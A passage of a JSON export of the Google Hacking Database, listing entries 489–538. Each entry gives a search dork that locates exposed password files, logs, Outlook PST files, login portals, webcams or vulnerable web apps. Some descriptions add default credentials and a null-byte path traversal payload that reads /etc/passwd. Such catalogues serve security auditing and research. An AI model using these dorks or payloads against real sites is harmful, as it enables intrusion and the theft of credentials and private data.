    }, 
    {
        "signatureReferenceNumber": "489", 
        "link": "https://www.exploit-db.com/ghdb/489/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=%22FC+Bigfeet%22+-inurl%3Amail", 
        "shortDescription": "Quicksite demopages for Typo3", 
        "textualDescription": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The quicksite package is a demosite for typo3. Quicksite or Testsite will install a complete website of a soccerclub using the following credentials:user:adminpassword:passwordIf you want to login, again append \"typo3\" to the website dir.Vendor: http://www.typo3.com/An attacker will consider this as yet another way to find Typo3 hosts for which security focus lists vulnerabilities."
    }, 
    {
        "signatureReferenceNumber": "490", 
        "link": "https://www.exploit-db.com/ghdb/490/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?q=site%3Anetcraft.com+intitle%3AThat.Site.Running+Apache", 
        "shortDescription": "site:netcraft.com intitle:That.Site.Running Apache", 
        "textualDescription": "Netcraft reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site. So, Netcraft scans Web servers, Google scans Netcraft, and the hacker scans Google.This search is easily modified (replace \"apache\" for the other server software), thus adding yet another way to find the webserver software version info."
    }, 
    {
        "signatureReferenceNumber": "491", 
        "link": "https://www.exploit-db.com/ghdb/491/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=ext:log+%22Software:+Microsoft+Internet+Information+Services+*.*%22", 
        "shortDescription": "ext:log \"Software: Microsoft Internet Information Services *.*\"", 
        "textualDescription": "Microsoft Internet Information Services (IIS) has log files that are normally not in the docroot, but then again, some people manage to share them. An attacker may use these to gather: loginnames (FTP service), pathinformation, databasenames, and stuff..Examples:12:09:37 194.236.57.10 [2501]USER micze 33112:09:38 194.236.57.10 [2501]PASS - 23008:30:38 194.236.57.10 [2416]DELE com-gb97.mdb2000-06-18 15:08:30 200.16.212.225 activeip\\carpinchos 4.22.121.13 80 POST /_vti_bin/_vti_aut/author.dll - 200 2958 551 120 MSFrontPage/4.0 -"
    }, 
    {
        "signatureReferenceNumber": "492", 
        "link": "https://www.exploit-db.com/ghdb/492/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=filetype%3Acgi+inurl%3Atseekdir.cgi", 
        "shortDescription": "filetype:cgi inurl:tseekdir.cgi", 
        "textualDescription": "The Turbo Seek search engine has a vulnerability. The removed user can look at the contents of files on target. A removed user can request an URL with name of a file, which follows NULL byte (%00) to force system to display the contents of a required file, for example:/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00/cgi-bin/tseekdir.cgi?id=799*location=/etc/passwd%00 More: http://www.securitytracker.com/alerts/2004/Sep/1011221.html"
    }, 
    {
        "signatureReferenceNumber": "493", 
        "link": "https://www.exploit-db.com/ghdb/493/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+phpOpenTracker%22+Statistics+&btnG=Google+Search", 
        "shortDescription": "\"Powered by phpOpenTracker\" Statistics", 
        "textualDescription": "phpOpenTracker is a framework solution for the analysis of website traffic and visitor analysis. More info at the vendor site: http://www.phpopentracker.de/en/index.phpA prebuild sample report is shipped with PhpOpenTracker which is used by most sites. This report does not use all possibilities of the framework like user tracking."
    }, 
    {
        "signatureReferenceNumber": "494", 
        "link": "https://www.exploit-db.com/ghdb/494/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&q=filetype%3Avcs+vcs", 
        "shortDescription": "filetype:vcs vcs", 
        "textualDescription": "Filext.com says: \"Various programs use the *.VCS extension; too many to list individually. Take clues from the location of the file as a possible pointer to exactly which program is producing the file. The file's date and time can also help if you know which programs you were running when the file was written.\"The most common use is the \"vCalendar File\", used by Outlook for example. It can also belong to a \"Palm vCal Desktop Application\". For those who prefer clean searches, try these variations (with less results):\"PRODID: PalmDesktop Generated\"filetype:vcs VCALENDAR filetype:vcs BEGIN:VCALENDAR"
    }, 
    {
        "signatureReferenceNumber": "495", 
        "link": "https://www.exploit-db.com/ghdb/495/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=filetype%3Aconfig+config+intext%3AappSettings+%22User+ID%22", 
        "shortDescription": "filetype:config config intext:appSettings \"User ID\"", 
        "textualDescription": "These files generally contain configuration information for a .Net Web Application. Things like connection strings to databases file directories and more. On a properly setup IIS these files are normally not served to the public."
    }, 
    {
        "signatureReferenceNumber": "496", 
        "link": "https://www.exploit-db.com/ghdb/496/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?q=inurl%3A%22%2Fcatalog%2Ensf%22+intitle%3Acatalog", 
        "shortDescription": "inurl:\"/catalog.nsf\" intitle:catalog", 
        "textualDescription": "This will return servers which are running versions of Lotus Domino. The catalog.nsf is the servers DB catalog. It will list all the DB's on the server and sometimes some juicy info too.  An attacker can back the url down to the \"/catalog.nsf\" part if needed."
    }, 
    {
        "signatureReferenceNumber": "497", 
        "link": "https://www.exploit-db.com/ghdb/497/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Apst+inurl%3A%22outlook.pst%22", 
        "shortDescription": "filetype:pst inurl:\"outlook.pst\"", 
        "textualDescription": "All versions of the popular business groupware client called Outlook have the possibility to store email, calenders and more in a file for backup or migration purposes.An attacker may learn a great deal about the owner or the company by downloading these files and importing them in his own client for his viewing pleasure."
    }, 
    {
        "signatureReferenceNumber": "498", 
        "link": "https://www.exploit-db.com/ghdb/498/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&q=%22index+of%2F%22+%22ws_ftp.ini%22+%22parent+directory%22", 
        "shortDescription": "\"index of/\" \"ws_ftp.ini\" \"parent directory\"", 
        "textualDescription": "This search is a cleanup of a previous entry by J0hnny. It uses \"parent directory\" to avoid results other than directory listings.WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords. There is another way to find this file, that was added by Xewan:filetype:ini ws_ftp pwdIn our experience it's good to try both methods, as the results will differ quite a bit."
    }, 
    {
        "signatureReferenceNumber": "499", 
        "link": "https://www.exploit-db.com/ghdb/499/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aphp+inurl%3Aindex.php+inurl%3A%22module%3Dsubjects%22+inurl%3A%22func%3D*%22+%28listpages%7C+viewpage+%7C+listcat%29&btnG=Google+Search", 
        "shortDescription": "filetype:php inurl:index.php inurl:\"module=subjects\" inurl:\"func=*\" (listpages| viewpage | listcat)", 
        "textualDescription": "Reportedly the PostNuke Modules Factory Subjects module is affected by a remote SQL injection vulnerability. http://securityfocus.com/bid/11148/discussion/"
    }, 
    {
        "signatureReferenceNumber": "500", 
        "link": "https://www.exploit-db.com/ghdb/500/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=uploadpics.php%3Fdid%3D+-forum", 
        "shortDescription": "W-Nailer Upload Area", 
        "textualDescription": "What is W-Nailer?W-Nailer is a PHP script which can create galleries for you.It uses a graphical library (GD) which enables PHP to manipulate images, for instance resizing to create thumbnails.W-Nailer is highly configurable to meet your needs. Even better, the configuration is nearly completely webbased.So after you have uploaded your files, you will just need your browser!"
    }, 
    {
        "signatureReferenceNumber": "501", 
        "link": "https://www.exploit-db.com/ghdb/501/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Acgi+inurl%3Apdesk.cgi&btnG=Search", 
        "shortDescription": "filetype:cgi inurl:pdesk.cgi", 
        "textualDescription": "PerlDesk is a web based help desk and email management application designed to streamline support requests, with built in tracking and response logging.http://www.securitytracker.com/alerts/2004/Sep/1011276.html"
    }, 
    {
        "signatureReferenceNumber": "502", 
        "link": "https://www.exploit-db.com/ghdb/502/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=ext%3Aldif+ldif&btnG=Google+Search", 
        "shortDescription": "ext:ldif ldif", 
        "textualDescription": "www.filext.com says LDIF = LDAP Data Interchange Format.LDAP is used for nearly everything in our days, so this file may include some juice info for attackers. They can add INTEXT:keyword to get more specific targets."
    }, 
    {
        "signatureReferenceNumber": "503", 
        "link": "https://www.exploit-db.com/ghdb/503/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=inurl:mewebmail&hl=en&lr=&ie=UTF-8&filter=0", 
        "shortDescription": "inurl:mewebmail", 
        "textualDescription": "MailEnable Standard Edition provides robust SMTP and POP3 services for Windows NT/2000/XP/2003 systems. This version is free for both personal and commercial usage and does not have any time, user or mailbox restrictions.This search is a portal search. If finds the logins screens. If a vulnerability is found, this search becomes the target base for an attacker."
    }, 
    {
        "signatureReferenceNumber": "504", 
        "link": "https://www.exploit-db.com/ghdb/504/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Powered+by+IceWarp+Software%22+inurl%3Amail", 
        "shortDescription": "\"Powered by IceWarp Software\" inurl:mail", 
        "textualDescription": "IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. Few details regarding the specific vulnerabilities are known. These vulnerabilities are reported to affect all versions of IceWarp Web Mail prior to version 5.2.8.There are two ways to find installations of IceWarp:\"Powered by IceWarp Software\" inurl:mailintitle:\"IceWarp Web Mail\" inurl:\":32000/mail/\"http://www.securityfocus.com/bid/10920"
    }, 
    {
        "signatureReferenceNumber": "505", 
        "link": "https://www.exploit-db.com/ghdb/505/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.co.uk/search?q=inurl:/_layouts/settings&hl=en&lr=&ie=UTF-8&safe=off&start=10&sa=N", 
        "shortDescription": "inurl:/_layouts/settings", 
        "textualDescription": "With the combined collaboration features of Windows SharePoint Services and SharePoint Portal Server 2003, users in an organization can create, manage, and build collaborative Web sites and make them available throughout the organization. More information is available at : http://www.microsoft.com/sharepoint/Loads of company info can be gained by an attacker when the URL's are unprotected. Furthermore unprotected sharepoint sites give full \"Edit, Add and Delete access\" to the information, which in case of malicious users may cause loss of important data."
    }, 
    {
        "signatureReferenceNumber": "506", 
        "link": "https://www.exploit-db.com/ghdb/506/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22MRTG%2FRRD%22+1.1*+%28inurl%3Amrtg.cgi+%7C+inurl%3A14all.cgi+%7Ctraffic.cgi%29+&btnG=Search", 
        "shortDescription": "intitle:\"MRTG/RRD\" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)", 
        "textualDescription": "The remote user can reportedly view the first string of any file on the system where script installed. This is a very old bug, but some sites never upgraded their MRTG installations.http://www.securitytracker.com/alerts/2002/Feb/1003426.htmlAn attacker will find it difficult to exploit this in any usefull way, but it does expose one line of text from a file, for example (using the file /etc/passwd) shows this:ERROR: CFG Error Unknown Option \"root:x:0:1:super-user:/\" on line 2 or above."
    }, 
    {
        "signatureReferenceNumber": "507", 
        "link": "https://www.exploit-db.com/ghdb/507/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=filetype%3Amdb+wwforum", 
        "shortDescription": "filetype:mdb wwforum", 
        "textualDescription": "Web Wiz Forums is a free ASP Bulletin Board software package. It uses a Microsoft Access database for storage. The installation instructions clearly indicate to change the default path and filename (admin/database/wwForum.mdb).vendor: http://www.webwizguide.info/web_wiz_forums/The forum database contains the members passwords, either encrypted or in plain text, depending on the version.Please note: this search is proof that results can stay in Google's index for a long time, even when they are not on the site any longer. Currently only 2 out of 9 are actually still downloadable by an attacker."
    }, 
    {
        "signatureReferenceNumber": "508", 
        "link": "https://www.exploit-db.com/ghdb/508/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=%22Powered+By+Elite+Forum+Version+*.*%22", 
        "shortDescription": "\"Powered By Elite Forum Version *.*\"", 
        "textualDescription": "Elite forums is one of those Microsoft Access .mdb file based forums. This one is particularly dangerous, because the filename and path are hardcoded in the software. An attacker can modify index.php for ./data/users/userdb.dat, open the file and see something like this:42administrat4571XXX367b52XXXb33b6ce74df1e0170(data was xx'd)These are MD5 digests and can be brute forced (with enough time) or dictionary cracked by a malicious user, thus giving adminstrator access to the forum."
    }, 
    {
        "signatureReferenceNumber": "509", 
        "link": "https://www.exploit-db.com/ghdb/509/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22microsoft+certificate+services%22+inurl%3Acertsrv&btnG=Search", 
        "shortDescription": "intitle:\"microsoft certificate services\" inurl:certsrv", 
        "textualDescription": "Microsoft Certificate Services Authority (CA) software can be used to issue digital certificates. These are often used as \"proof\" that someone or something is what they claim they are. The Microsoft certificates are meant to be used with IIS for example with Outlook Web Access. The users of these certificates have to decide if they trust it or not. If they do, they can import a root certificate into their browsers (IE).Anyways, this search by JimmyNeutron uncovers a few of these certificate servers directly connected to the Internet. Which (in theory) means anyone could issue a certificate from these sites and abuse it to mislead websurfers in phishing scams and such."
    }, 
    {
        "signatureReferenceNumber": "510", 
        "link": "https://www.exploit-db.com/ghdb/510/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22webadmin+-+%2F*%22+f", 
        "shortDescription": "intitle:\"webadmin - /*\" filetype:php directory filename permission", 
        "textualDescription": "Webadmin.php is a free simple Web-based file manager. This search finds sites that use this software. If left unprotected an attacker files can be modified or added on the server.More info and screenshot at: http://cker.name/webadmin/"
    }, 
    {
        "signatureReferenceNumber": "511", 
        "link": "https://www.exploit-db.com/ghdb/511/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&&q=intitle%3AAnswerBook2+inurl%3Aab2%2F+%28inurl%3A8888+%7C+inurl%3A8889%29", 
        "shortDescription": "intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)", 
        "textualDescription": "First of all this search indicates solaris machines and second the webservice is vulnerable to a format string attack.Sun's AnswerBook 2 utilizes a third-party web server daemon (dwhttpd) that suffers from a format string vulnerability. The vulnerability can be exploited to cause the web server process to execute arbitrary code. The web server runs as user and group 'daemon' who, under recent installations of Solaris, owns no critical fileshttp://www.securiteam.com/unixfocus/5SP081F80K.htm"
    }, 
    {
        "signatureReferenceNumber": "512", 
        "link": "https://www.exploit-db.com/ghdb/512/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22Live+View+%2F+-+AXIS%22+%7C+inurl%3Aview%2Fview.shtml%5E", 
        "shortDescription": "More Axis netcams !", 
        "textualDescription": "More Axis Netcams, this search combines the cams with the default title (Live View) and extends it by searching for the \"view/view.shtml\" URL identifier. Models found with this search are:AXIS 205 version 4.02AXIS 206M Network Camera version 4.10AXIS 206W Network Camera version 4.10AXIS 211 Network Camera version 4.02AXIS 241S Video Server version 4.02AXIS 241Q Video Server version 4.01Axis 2100 Network CameraAxis 2110 Network Camera 2.34Axis 2120 Network Camera 2.40AXIS 2130R PTZ Network Camera"
    }, 
    {
        "signatureReferenceNumber": "513", 
        "link": "https://www.exploit-db.com/ghdb/513/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle:%22The+AXIS+200+Home+Page%22", 
        "shortDescription": "intitle:\"The AXIS 200 Home Page\"", 
        "textualDescription": "The Axis 200 HOME pages reside within the AXIS 200 device and  hold information about the current software version, technical documentation, some howto's and the device settings."
    }, 
    {
        "signatureReferenceNumber": "514", 
        "link": "https://www.exploit-db.com/ghdb/514/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%28%22Fiery+WebTools%22+inurl%3Aindex2.html%29+%7C+%22WebTools+enable+*+*+observe%2C+*%2C+*+*+*+flow+*+print+jobs%22&btnG=Search", 
        "shortDescription": "(\"Fiery WebTools\" inurl:index2.html) | \"WebTools enable * * observe, *, * * * flow * print jobs\"", 
        "textualDescription": "Fiery WebTools offers many of the same capabilities of the Command WorkStation\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2, via a Java-enabled Web browser. All job control options such as job merging, edition and previews, as well as information on the status of the jobs are accessible through Fiery WebTools."
    }, 
    {
        "signatureReferenceNumber": "515", 
        "link": "https://www.exploit-db.com/ghdb/515/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22network+administration%22+inurl%3A%22nic%22", 
        "shortDescription": "Konica Network Printer Administration", 
        "textualDescription": "This finds Konica Network Printer Administration pages. There is one result at the time of writing."
    }, 
    {
        "signatureReferenceNumber": "516", 
        "link": "https://www.exploit-db.com/ghdb/516/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Asts_index.cgi", 
        "shortDescription": "Aficio 1022", 
        "textualDescription": "The Ricoh Aficio 1022 is a digital multifunctional B&W copier, easily upgraded to include network printing, network scanning, standard/LAN faxing and storage capabilities."
    }, 
    {
        "signatureReferenceNumber": "517", 
        "link": "https://www.exploit-db.com/ghdb/517/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3ARICOH+intitle%3A%22Network+Administration%22", 
        "shortDescription": "intitle:RICOH intitle:\"Network Administration\"", 
        "textualDescription": "Network Administration pages for several Ricoh Afficio printer models, for example the Aficio 1018D and RICOH LASER AP1600."
    }, 
    {
        "signatureReferenceNumber": "518", 
        "link": "https://www.exploit-db.com/ghdb/518/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle:%22lantronix+web-manager%22&hl=en&lr=&ie=UTF-8&filter=0", 
        "shortDescription": "intitle:\"lantronix web-manager\"", 
        "textualDescription": "The Lantronix web manager home pages show the print server configuration (Server Name, Boot Code Version, Firmware, Uptime, Hardware Address, IP Address and Subnet Mask). The other setting pages are password protected."
    }, 
    {
        "signatureReferenceNumber": "519", 
        "link": "https://www.exploit-db.com/ghdb/519/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22remote+ui%3Atop+page%22", 
        "shortDescription": "Canon ImageReady machines", 
        "textualDescription": "The \"large\" Canon ImageReady machines with model versions 3300, 5000 & 60000."
    }, 
    {
        "signatureReferenceNumber": "520", 
        "link": "https://www.exploit-db.com/ghdb/520/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%28%28inurl%3Aifgraph+%22Page+generated+at%22%29+OR+%28%22This+page+was+built+using+ifgraph%22%29%29+&btnG=Search", 
        "shortDescription": "((inurl:ifgraph \"Page generated at\") OR (\"This page was built using ifgraph\"))", 
        "textualDescription": "ifGraph is a set of perl scripts that were created to fetch data from SNMP agents and feed a RRD file (Round Robin Database) so that graphics can be created later. The graphics and the databases are created using a tool called RRDTool."
    }, 
    {
        "signatureReferenceNumber": "521", 
        "link": "https://www.exploit-db.com/ghdb/521/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?q=ext:cgi+intext:%22nrg-%22+%22+This+web+page+was+created+on+%22&hl=en&lr=&ie=UTF-8&filter=1", 
        "shortDescription": "ext:cgi intext:\"nrg-\" \" This web page was created on \"", 
        "textualDescription": "NRG is a system for maintaining and visualizing network data and other resource utilization data. It automates the maintenance of RRDtool databases and graph web pages (that look like MRTG web pages.)"
    }, 
    {
        "signatureReferenceNumber": "522", 
        "link": "https://www.exploit-db.com/ghdb/522/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%2B%22%3A8080%22+%2B%22%3A3128%22+%2B%22%3A80%22+filetype%3Atxt", 
        "shortDescription": "+\":8080\" +\":3128\" +\":80\" filetype:txt", 
        "textualDescription": "With the string [+\":8080\" +\":3128\" +\":80\" filetype:txt] it is possible to find huge lists of proxies... So, I've written a simple shell script that checks these lists and filters out the not responding proxies. It also stores time response in another file, so you can choose only fast proxies. Furthermore it can control the zone of the proxy with a simple whois grep... The script proxytest.sh is on my website:http://rawlab.relay.homelinux.net/programmi/proxytest.sh"
    }, 
    {
        "signatureReferenceNumber": "523", 
        "link": "https://www.exploit-db.com/ghdb/523/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=inurl%3Acom_remository", 
        "shortDescription": "ReMOSitory module for Mambo", 
        "textualDescription": "It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input. Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.Full report: http://www.securityfocus.com/bid/11219Klouw suggests: inurl:index.php?option=com_remository&Itemid= Renegade added : \".. to get an administrator login, change the url to http://www.example.com/administrator .. it will pop up an login box..."
    }, 
    {
        "signatureReferenceNumber": "524", 
        "link": "https://www.exploit-db.com/ghdb/524/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=inurl%3Acgi.asx%3FStoreID+%0D%0A+%0D%0A&btnG=Google-Suche&meta=", 
        "shortDescription": "inurl:cgi.asx?StoreID", 
        "textualDescription": "BeyondTV is a web based software product which let you manage your TV station. All you need is to install a TV tuner card on your PC and Connect your TV source (i.e. television antenna) to your TV tuner card. With a installed BeyondTV version you can now administrate your TV with your browser even over the internet."
    }, 
    {
        "signatureReferenceNumber": "525", 
        "link": "https://www.exploit-db.com/ghdb/525/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=inurl%3Ahp%2Fdevice%2Fthis.LCDispatcher+&btnG=Suche&lr=&btnG=Google-Suche&meta=", 
        "shortDescription": "inurl:hp/device/this.LCDispatcher", 
        "textualDescription": "This one gets you on the web interface of some more HP Printers."
    }, 
    {
        "signatureReferenceNumber": "526", 
        "link": "https://www.exploit-db.com/ghdb/526/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22WordPress+%3E+*+%3E+Login+form%22+inurl%3A%22wp-login.php%22+&btnG=Search", 
        "shortDescription": "intitle:\"WordPress > * > Login form\" inurl:\"wp-login.php\"", 
        "textualDescription": "WordPress is a semantic personal publishing platform.. it suffers from a possible XSS attacks.http://www.securityfocus.com/bid/11268/info/"
    }, 
    {
        "signatureReferenceNumber": "527", 
        "link": "https://www.exploit-db.com/ghdb/527/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3Awebeye+inurl%3Alogin.ml+&btnG=Search", 
        "shortDescription": "intitle:webeye inurl:login.ml", 
        "textualDescription": "This one gets you on the webinterface of Webeye webcams."
    }, 
    {
        "signatureReferenceNumber": "528", 
        "link": "https://www.exploit-db.com/ghdb/528/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3A%22comment.php%3Fserendipity%22&btnG=Search", 
        "shortDescription": "inurl:\"comment.php?serendipity\"", 
        "textualDescription": "serendipity is a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source.For an attacker it is possible to inject SQL commands.http://www.securityfocus.com/bid/11269/discussion/"
    }, 
    {
        "signatureReferenceNumber": "529", 
        "link": "https://www.exploit-db.com/ghdb/529/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22Powered+by+AJ-Fork+v.167%22+%0D%0A&btnG=Search", 
        "shortDescription": "\"Powered by AJ-Fork v.167\"", 
        "textualDescription": "AJ-Fork is, as the name implies - a fork. Based on the CuteNews 1.3.1 core, the aim of the project is to improve what can be improved, and extend what  can be extended without adding too much bloat (in fierce opposition to the mainstream blogging/light publishing tools of today). The project aims to  be backwards-compatible with CuteNews in what areas are sensible.  It is vulnerable for a full path disclosure.  http://www.securityfocus.com/bid/11301"
    }, 
    {
        "signatureReferenceNumber": "530", 
        "link": "https://www.exploit-db.com/ghdb/530/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com.ar/search?hl=es&ie=ISO-8859-1&q=%22Powered+by+Megabook+*%22+inurl%3Aguestbook.cgi+%0D%0A&btnG=B%FAsqueda&meta=", 
        "shortDescription": "\"Powered by Megabook *\" inurl:guestbook.cgi", 
        "textualDescription": "MegaBook is a web-based guestbook that is intended to run on Unix and  Linux variants. MegaBook is prone to multiple HTML injection vulnerabilities. http://www.securityfocus.com/bid/8065"
    }, 
    {
        "signatureReferenceNumber": "531", 
        "link": "https://www.exploit-db.com/ghdb/531/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intitle:%22axis+storpoint+CD%22+intitle:%22ip+address%22&hl=en&lr=&ie=UTF-8&filter=0", 
        "shortDescription": "intitle:\"axis storpoint CD\" intitle:\"ip address\"", 
        "textualDescription": "Axis' network CD/DVD servers are faster, less costly and easier to manage than using full-blown file servers for networking CD/DVD collections. Any organization that relies heavily on CD/DVD-based information can benefit from an AXIS StorPoint CD+."
    }, 
    {
        "signatureReferenceNumber": "532", 
        "link": "https://www.exploit-db.com/ghdb/532/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=intext%3ASQLiteManager+inurl%3Amain.php&btnG=Search&hl=en&lr=&ie=UTF-8", 
        "shortDescription": "intext:SQLiteManager inurl:main.php", 
        "textualDescription": "sQLiteManager is a tool Web multi-language of management of data bases SQLite.  # Management of several data base (Creation, access or upload basic)  # Management of the attached bases of donn\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a8es  # Creation, modification and removal of tables and index.  # Insertion, modification, suppression of recording in these tables"
    }, 
    {
        "signatureReferenceNumber": "533", 
        "link": "https://www.exploit-db.com/ghdb/533/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22oMail-admin+Administration+-+Login%22++-inurl%3Aomnis.ch&btnG=Search", 
        "shortDescription": "intitle:\"oMail-admin Administration - Login\"  -inurl:omnis.ch", 
        "textualDescription": "oMail-webmail is a Webmail solution for mail servers based on qmail and optionally vmailmgr or vpopmail. The mail is read directly from maildirs on the hard disk, which is much quicker than using protocols like POP3 or IMAP. Other features includes multiple language support (English, French, German, Japanese, Chinese, and many more), HTML and pictures inline display, folders, and address book support."
    }, 
    {
        "signatureReferenceNumber": "534", 
        "link": "https://www.exploit-db.com/ghdb/534/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?q=inurl:%22map.asp%3F%22+intitle:%22WhatsUp+Gold%22&hl=en&lr=&ie=UTF-8&filter=0", 
        "shortDescription": "inurl:\"map.asp?\" intitle:\"WhatsUp Gold\"", 
        "textualDescription": "\"WhatsUp Gold's new SNMP Viewer tool enables Area-Wide to easily track variables associated with any port on a network device. With a few simple clicks, a network engineer can select device ports, navigate trees, and graph variables in real time. For instance, Area-Wide can track bandwidth or CPU utilization on a router to aid in capacity and resource management.\""
    }, 
    {
        "signatureReferenceNumber": "535", 
        "link": "https://www.exploit-db.com/ghdb/535/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?q=inurl:%22+WWWADMIN.PL%22+intitle:%22wwwadmin%22&hl=en&lr=&ie=UTF-8&start=0&sa=N", 
        "shortDescription": "inurl:\" WWWADMIN.PL\" intitle:\"wwwadmin\"", 
        "textualDescription": "wwwadmin.pl is a script that allows a user with a valid username and password, to delete files and posts from the associated forum."
    }, 
    {
        "signatureReferenceNumber": "536", 
        "link": "https://www.exploit-db.com/ghdb/536/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3Aodbc.ini+ext%3Aini+-cvs&btnG=Search", 
        "shortDescription": "inurl:odbc.ini ext:ini -cvs", 
        "textualDescription": "This search will show the googler ODBC client configuration files which may contain usernames/databases/ipaddresses and whatever."
    }, 
    {
        "signatureReferenceNumber": "537", 
        "link": "https://www.exploit-db.com/ghdb/537/", 
        "category": "Footholds", 
        "querystring": "http://www.google.com/search?q=intitle:%22Web+Data+Administrator+-+Login%22&hl=en&lr=&ie=UTF-8&filter=0", 
        "shortDescription": "intitle:\"Web Data Administrator - Login\"", 
        "textualDescription": "The Web Data Administrator is a utility program implemented in ASP.NET that enables you to easily manage your SQL Server data wherever you are. Using its built-in features, you can do the following from Internet Explorer or your favorite Web browser. Create and edit databases in Microsoft SQL Server 2000 or Microsoft SQL Server 2000 Desktop Engine (MSDE) Perform ad-hoc queries against databases and save them to your file system Export and import database schema and data."
    }, 
    {
        "signatureReferenceNumber": "538", 
        "link": "https://www.exploit-db.com/ghdb/538/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=intitle:%22Object+not+found%22+netware+%22apache+1..%22&hl=en&lr=&filter=0", 
        "shortDescription": "intitle:\"Object not found\" netware \"apache 1..\"", 
        "textualDescription": "This search will show netware apache webservers as the result."
    }, 
    {
        "signatureReferenceNumber": "539", 
        "link": "https://www.exploit-db.com/ghdb/539/", 
        "category": "Various Online Devices", 
